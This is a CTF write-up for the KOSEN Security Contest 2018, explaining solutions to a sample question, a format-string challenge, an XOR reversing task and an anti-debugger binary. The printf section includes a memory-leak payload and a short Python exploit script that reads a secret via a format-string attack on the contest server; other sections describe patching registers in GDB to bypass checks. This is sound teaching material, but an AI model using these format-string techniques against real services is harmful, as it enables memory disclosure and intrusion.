KOSEN Security Contest 2018 Write-Up

CTFを始めた友人のために英語でWrite-Upを書いてみます.英語は得意ではないのでいろいろとご了承くださいませ.

 

KOSEN Security Contest 2018 was held from September 1st to 2nd. It's a CTF for Kosen students. 

I enter the contest with my Laboratory member and my juniors.  Our team name is 074m4K053n and the team was 3rd position. (3rd / 36teams)

 

f:id:tokunn:20180903215121p:plain

I solved following questions.

  • [Sample] 100 Sample
  • [Binary] 100 printf
  • [Binary] 200 XOR, XOR
  • [Binary] 250 Simple anti debugger
  • [Network] 150 Login and Get flag
  • [Web] 100 Steal a information from Server
  • [Web] 300 Steal a account
  • [Misc] 50 I don't wanna see HITO OOSUGI
  • [Misc] 100 No disc space

f:id:tokunn:20180903220349p:plain

 

And I'll explain about these questions.

 

 

00 [Sample] 100 Sample

f:id:tokunn:20180903222520p:plain

[Question]

CTF is a competition which find answers called "flag".

The flag shape is SCKOSEN{foobar}.

In order to practice, submit current japanese era as flag.

example :

SHOWA (1926 - 1989) -> SCKOSEN{SHOWA}

MEIJI (1868 - 1912 ) -> SCKOSEN{MEIJI}

TAISHO (1912 - 1926) -> SCKOSEN{TAISHO}

 

[Solution]

This is sample question.

Current japanese era is Heisei (1989 - 2019).

So, flag is SCKOSEN{HEISEI}.

 

 

03 [Binary] 100 printf

f:id:tokunn:20180903224338p:plain

[Question]

Steal a flag !

How to connect to game : nc [foobar] [port] example: nc 27.133.152.42 80

 

[Solution]

 Use sample command then get following strings.

$ nc 27.133.152.42 80

Secret is in 0xffc9a37e

What do you want: 

Type "Earth" then get following strings.

$ nc 27.133.152.42 80

the secret is in 0xffc9a37e

what do you want: Earth

there is no Earth

 Type "AAAA,%p,%p,%p,%p,%p,%p" and get

the secret is in 0xff985c6e
what do you want: AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
there is no AAAA,0x100,0xf7ed65c0,(nil),(nil),(nil),(nil),0x43530000,0x45534f4b,0x73757b4e,0x72705f65,0x66746e69,0x726f635f,0x74636572,0x7d796c,0x41414141,0x2c70252c,0x252c7025,0x70252c70,0x2c70252c,0x252c7025

As you can see from the result, we could leak few value in the memory by using %p. So, we can use Format String Attack.

 

Let's see the result again

AAAA,

0x100, 

0xf7ed65c0,

(nil),

(nil),

(nil),

(nil),

0x43530000,

0x45534f4b,

0x73757b4e,

0x72705f65,

0x66746e69,

0x726f635f,

0x74636572,

0x7d796c,

0x41414141,

We can find 0x41414141 (It's "AAAA" wiritten in ascii) at 15th position. The 0x41414141 is a string which I send.

So, if we send a address instead of "AAAA", we can read value from the address.

 

Attack string : 

{secret address}, %15$s

We can get {secret address} from "the secret is in 0xff985c6e"

 

And python script is here :

#!/usr/bin/env python2

import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect*1
res = s.recv(4096)
res += s.recv(4096)
print(res)
addr = int(res.split()[4],16)
#buf = "AAAA"
buf = struct.pack("<I", addr)
#buf += ',%p' * 20
buf += ',%15$s'
buf += '\n'
s.send(buf)
print(buf)
res = s.recv(4096)
res += s.recv(4096)
res += s.recv(4096)
print(res)
s.close()

 And result is here : 

the secret is in 0xffc0b52e
what do you want:
.���,%15$s

there is no .���,SCKOSEN{use_printf_correctly}

 

 

04 [Binary] 200 XOR, XOR

f:id:tokunn:20180904084954p:plain

[Question]

Read assembly and get flag ! 

 

[Solution]

There is a file the name is "asmreading".

First, check the file by using file command

$ file ./asmreading 

asmreading: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped

It's ELF fexecutable file.

Next, use GDB debugger, and disassemble main function.

f:id:tokunn:20180904182441p:plain

We can see the ASCII codes and xor_func. So, xor_func seems to be decode function.

To check that, set break point after call xor_func and run the executable file.

f:id:tokunn:20180904182731p:plain

And then, we can find a decoded flag.

Flag is SCKOSEN{you_can_read_assembly}. (But I didn't read assembly ...)

 

 

05 [Binary] 250 Simple anti debugger

f:id:tokunn:20180904183010p:plain

[Question]

I attached it from GDB, but it doesn't work.

How can I analyse it ?

 

[Solution]

There is a file the name is "simple_anti_debugger".

First, check the file by using file command

$ file ./simple_anti_debugger

asmreading: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped

It's ELF fexecutable file.

Next, use GDB debugger. But I couldn't execute binary with debugger because of unti debug technique.

So first, see the function information. There is detect_debugger function. Let's try to avoid it.

f:id:tokunn:20180904203950p:plain

In detect_debugger function, eax register is compared with 0xffffff. If eax is 0xffffff, program will go to exit code.

To avoid it, I change the value in eax.

f:id:tokunn:20180904204003p:plain

And now, we can use debugger in main function.

f:id:tokunn:20180904204019p:plain

Change eax again to avoid password check.

f:id:tokunn:20180904204028p:plain

And then, we can get flag. Flag is SCKOSEN{I_like_debugger}.

 

 

 

I'll write other question later.....

 

 

*1: '27.133.152.42', 80